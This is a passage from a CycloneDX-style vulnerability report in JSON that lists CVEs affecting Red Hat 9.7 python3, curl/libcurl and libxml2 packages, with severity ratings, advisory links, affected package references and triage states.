        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-6253",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "A flaw was found in curl. When curl is configured to use distinct proxies for different URL schemes, a redirect from a URL using an authenticated proxy to one using an unauthenticated proxy can inadvertently expose the initial proxy's credentials. This improper credential management (CWE-522) may allow an attacker to gain unauthorized access or information by intercepting these disclosed credentials.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6253"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6253"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6253"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6253"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6276",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw was found in libcurl. This vulnerability allows for information disclosure when a custom `Host:` header is used in an initial HTTP request, and a subsequent request reuses the same connection without specifying a new `Host:` header. This can lead to libcurl incorrectly sending cookies intended for the first host to the second host, resulting in a cookie leak. This issue is categorized as an Origin Validation Error (CWE-346). Exploitation typically requires specific debugging configurations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6276"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6276"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6276"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6429",
      "ratings": [
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "A flaw was found in libcurl. When configured to use a .netrc file for credentials and follow HTTP redirects, libcurl can inadvertently send the password from the initial connection to the redirected host. This sensitive information disclosure occurs when both the original and redirect URLs use clear text HTTP, are performed over the same HTTP proxy, and the same connection is reused. This vulnerability, categorized as an Exposure of Sensitive Information to an Unauthorized Actor (CWE-200), could allow an attacker to obtain user credentials.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6429"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6429"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6429.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6429"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6429"
        }
      ],
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6732",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        843
      ],
      "description": "A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that includes an internal entity reference. An attacker could exploit this by providing a malicious document, leading to a type confusion error that causes the application to crash. This results in a denial of service (DoS), making the affected system or application unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6732"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:11503"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6732"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461300"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1097"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/411"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6732"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6732"
        }
      ],
      "published": "2026-04-23T23:16:16+00:00",
      "updated": "2026-05-05T13:58:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
